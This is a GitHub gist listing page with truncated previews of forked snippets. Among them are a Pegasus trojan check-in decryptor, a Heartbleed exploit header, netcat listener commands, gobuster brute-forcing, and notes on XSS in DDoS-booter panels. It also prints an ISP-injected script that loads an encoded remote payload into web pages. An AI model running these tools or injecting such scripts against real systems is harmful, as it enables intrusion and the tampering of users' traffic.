Skip to content

Instantly share code, notes, and snippets.

View Tubbz-alt's full-sized avatar
🎯
Focusing

James Collins Tubbz-alt

🎯
Focusing
View GitHub Profile
@Tubbz-alt
Tubbz-alt / Pegasus_checkin_decrypt.php
Created July 24, 2021 17:38 — forked from kirillwow/Pegasus_checkin_decrypt.php
Pegasus trojan from 2018 source code leak HTTP check-in. Decryption goes using TARGET_BUILDCHAIN_HASH 0x7393c9a643eb4a76
<?php
function hex_dump($data, $newline="\n")
{
static $from = '';
static $to = '';
static $width = 16; # number of bytes per line
static $pad = '.'; # padding for non-visible characters
# Models
class Animal < ActiveRecord::Base
parent_model
end
class Dolphin < Animal
parent_model exposes: [:swim, :chirp]
child_of :animal
@Tubbz-alt
Tubbz-alt / fibonacci-50.clj
Created May 28, 2021 15:19 — forked from jrmoran/fibonacci-50.clj
Fibonacci Sequence
(defn fib [n]
(Math/round (/ (- (Math/pow 1.618034 n)
(Math/pow (- 0.618034) n))
(Math/sqrt 5))))
(map fib (range 51))
;; (0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309 3524579 5702888 9227467 14930356 24157823 39088179 63246003 102334183 165580188 267914374 433494567 701408948 1134903525 1836312490 2971216044 4807528580 7778744699 12586273401)
@Tubbz-alt
Tubbz-alt / heartbleed.py
Created May 10, 2021 03:24 — forked from eelsivart/heartbleed.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@Tubbz-alt
Tubbz-alt / byebug_commands.md
Created February 7, 2021 17:25 — forked from elrayle/byebug_commands.md
Byebug Cheatsheet - organized by related commands

Byebug Cheatsheet

This cheatsheet includes most of the byebug commands organized by related commands (e.g. breakpoint related commands are together).

To see official help...

Command Aliases Example Comments
help h h list top level of all commands
help cmd h cmd-alias h n list the details of the next command (this works for all commands)
@Tubbz-alt
Tubbz-alt / Netcat.md
Created January 7, 2021 22:46 — forked from Integralist/Netcat.md
Netcat

Install the netcat nc command with Homebrew (otherwise Mac OS X version is really old and the interface is different):

brew install netcat

Use netcat to listen for incoming TCP connections on port 3000:

nc -l -p 3000
@Tubbz-alt
Tubbz-alt / gobust
Created January 7, 2021 22:45 — forked from NRKirby/gobust
#!/bin/sh
#: Title : gobust
#: Date : 2015-02-02
#: Author : "Nick Kirby" <@NRKirby>
#: Version : 1.0
#: Description : Common operations for blogging using Ghost | Buster | Forever
#: Options : start - start Ghost in production mode using Forever
#: : stop - stop Ghost using Forever
#: : generate - generate static site using Buster
#: : upload - Git add, prompt for comment and push origin master
#!/usr/bin/env python3
from os import system, fsencode, fsdecode, listdir
from multiprocessing import Pool
def gobust(fp):
f_name = fp.split('/')[-1].split('.txt')[0]
system('gobuster -u http://URLHERE -w {fp} -x txt,php -o gobuster-80-{f_name}.txt'.format(fp=fp, f_name=f_name))
@Tubbz-alt
Tubbz-alt / shitty-booter.md
Created January 7, 2021 00:37 — forked from inability/shitty-booter.md
This Gist describes various vulnerabilities in "booter sources".

This Gist describes various vulnerabilities in "booter sources", i.e. source code that is used for the frontends of "booter"/"stresser" services that offers DDoS attacks on demand.

Unknown Booter Source

I'm not sure where this particular source code comes from. I've seen it under the names "vDos Source", "Rage Booter", "Dream Source" and "MHC-Panic Booter Source".

Persistent XSS

There exists a persistent cross-site scripting vulnerability in the admin/manage.php script. When users sign up, they are asked to input an email address. The email is validated with PHP's FILTER_VALIDATE_EMAIL filter, which is relaxed with the emails that it accepts. The manage.php script, when called, displays the user's email without sanitising or filtering it.

@Tubbz-alt
Tubbz-alt / gist:64442d929011aabbc8df33d40d1126c1
Created January 7, 2021 00:36 — forked from donnykurnia/gist:2356dad4119ce85d18d18708914c60e3
Injection code from Telkom Indihome. This code will replace </body> at the end of webpage with the code below. The content may varied, but the main payload is loaded from cfs2.uzone.id
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnCgur28FUm401VrTNseDf2JlEA6ZiOk%2ffQK22KycK5kPdVDjpnejkM9P73Pe7Y6EuuaOitYkmzmKNO8RUzaFdaIXn6R7NkvKk9cKCHQzyvNXXPs%2bsueqLp2EKbC6X0Nu38%2fmvVexzHBsuqHkiQG%2bNd%2bm8E%2f1Gq6XVEDRBd4yBsks3piKPJIEbKaNRdQVxqlbqy5Bs6h0iSFn8zyf11ihllrf6ZNmrJse7MMGOa5Bg8V4gb29r7%2bHjvRblYlXTzoDaVMg79rr8%2fNSZ6ssVfsxi0UIiVvCjFalmdmUa4D3V21bRqM4cgubmchEbbS%2bil%2bkh%2bMxt3Lc4cILEYiziKexsYIRCUr4wR%2fPBUNQ0j4IIx1jEuAgOLeRdwvvw4aFM0V1i21bvKCvX8DaMIllnngEEJ09Ev%2fVl90I1UyrYKv6AaTOlPRBinecqub0KT%2flfLk3J5BMJsGhRjFCfISXqn01lRdvFPPMPwF0W10PRF8Of4%2feqOmNt6%2f1%2bIe66Xn2XLzyo%2fXuwHgr8%2fESw2BJ%2fexkP1